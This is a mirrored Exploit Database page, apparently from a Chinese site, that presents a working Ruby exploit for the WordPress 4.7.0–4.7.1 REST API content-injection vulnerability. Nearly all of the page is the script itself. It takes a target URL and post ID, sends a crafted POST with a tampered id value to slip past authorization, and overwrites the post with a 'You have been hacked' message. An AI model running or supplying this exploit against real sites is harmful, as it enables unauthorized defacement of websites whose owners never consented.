WordPress Core 4.7.0/4.7.1 – Content Injection (Ruby)

• Exploit Database
• 114 阅读

• 作者： Harsh Jaiswal
  日期： 2017-02-02
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/41224/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40

  # Exploit Title: WP Content Injection # Date: 31 Jan' 2017 # Exploit Author: Harsh Jaiswal # Vendor Homepage: http://wordpress.org # Version: WordPress 4.7 - 4.7.1 (Patched in 4.7.2) # Tested on: Backbox ubuntu Linux # Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html # Credits : Marc, Sucuri, Brute # usage : gem install rest-client # Lang : Ruby     require 'rest-client' require 'json' puts "Enter Target URI (With wp directory)" targeturi = gets.chomp puts "Enter Post ID" postid = gets.chomp.to_i response = RestClient.post( "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}", {   "id" => "#{postid}justrawdata", "title" => "You have been hacked", "content" => "Hacked please update your wordpress version"     }.to_json, :content_type => :json, :accept => :json ) {|response, request, result| response } if(response.code == 200)   puts "Done! '#{targeturi}/index.php?p=#{postid}'"     else puts "This site is not Vulnerable" end